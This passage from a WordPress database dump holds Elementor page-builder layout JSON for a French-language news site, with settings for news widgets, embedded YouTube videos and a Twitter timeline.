\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"3\"]},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Guin\\u00e9e innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false}]'),(1464,500,'_elementor_version','0.4'),(1465,500,'_elementor_css','a:3:{s:4:\"time\";i:1508922102;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(1467,501,'_elementor_edit_mode','builder'),(1468,501,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"p72uffi\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"4\",\"orderby\":\"name\",\"loop_infinite_class\":\"loop-infinte-list-2\",\"width\":\"700\",\"height\":\"500\",\"title_font_size\":{\"unit\":\"px\",\"size\":19},\"use_meta\":\"\",\"use_excerpt\":\"\",\"use_button\":\"\",\"content_half_mobile\":{\"unit\":\"px\",\"size\":270},\"content_half_2_mobile\":{\"unit\":\"px\",\"size\":300}},\"elements\":[],\"widgetType\":\"magzma-post-list-2\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"3\"],\"animate\":\"\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Guin\\u00e9e innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false}]'),(1469,501,'_elementor_version','0.4'),(1470,501,'_elementor_css','a:3:{s:4:\"time\";i:1508924012;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(1472,502,'_elementor_edit_mode','builder'),(1473,502,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma